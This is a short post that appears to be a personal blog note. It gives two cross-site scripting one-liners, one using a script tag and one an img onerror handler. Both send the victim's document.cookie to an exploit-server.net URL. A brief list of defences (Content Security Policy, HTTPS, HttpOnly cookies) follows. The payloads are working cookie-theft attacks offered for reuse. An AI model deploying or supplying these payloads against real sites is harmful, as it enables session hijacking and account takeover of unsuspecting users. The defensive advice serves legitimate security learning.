XSS - Script to steel cookies

A couple of XSS payloads I frequently use.

Example 1.- One Liner using script tag

<script>var i=new Image;i.src="https://exploit-0ac0001704ff51e6c0466e7d01db00fd.exploit-server.net/exploit?cookie=?"+document.cookie;</script>

Example 2.- One-Liner using <img> tag

<img src=x onerror=this.src='https://exploit-0ac0001704ff51e6c0466e7d01db00fd.exploit-server.net/exploit?cookie='+document.cookie;>

How to protect your cookies?

  • Implement Content Security Policy(CSP), examples
    Allow all scripts from only the origin website
    Content-Security-Policy: script-src 'self'

    Allow all scripts from the origin and trusted-domain.com (your domain) domain

    Content-Security-Policy: script-src 'self' https://trsuted-domain.com
  • Always use HTTPs, this will help to protect your users against man in the middle attacs
  • Use HttpOnly in your cookies. An HttpOnly cookie is not available to scripting languages like JavaScript.

More info https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies